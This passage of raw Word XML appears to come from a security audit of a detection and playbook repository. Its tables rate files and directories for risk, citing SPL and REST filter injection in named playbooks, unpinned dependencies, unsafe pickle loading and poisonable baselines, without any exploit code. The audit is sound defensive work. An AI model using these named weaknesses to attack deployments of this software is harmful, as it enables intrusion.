              <w:t>requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01,DEP-06,DEP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Single pin; 65 transitive packages float with no lockfile or hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/risk_notable_import_data.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/risk_notable_protect_assets_and_users.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06,PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/workbook_add.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/workbook_task_update.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Directory and group ratings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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3107"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="994"/>
        <w:gridCol w:w="3639"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Group rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/*.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (response playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>86</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Run with the automation account's privileges; many build commands and queries from attacker-influenced fields.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/custom_functions/*.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reusable SOAR helpers; several interpolate untrusted values into REST filters or compile user regex.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build and test untrusted pull-request content; handle cloud and publishing credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>data_sources/*.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>315</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sample logs that retain genuine account identifiers and employee personal data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>318</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Contains the self-poisoning stateful detections and placeholder-domain dead logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>baselines/**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Thirteen update baselines learn attacker-influenced values into shared allow-lists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1,523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mostly inert SPL over event data; a handful reach 3 to 5 (see 3.1 and 3.2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detections/{application,network,web}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>325</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>One SPL-injection detection and several case-sensitivity bypasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>macros/**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>lookups/**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>358</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Allow-list filters and reference data; permissive defaults and formula-prone CSV cells.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>deprecated/notebooks/*.ipynb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="994" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3639" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deserialize models with pickle and torch.load on stale libraries; excluded from the build.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>removed/**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
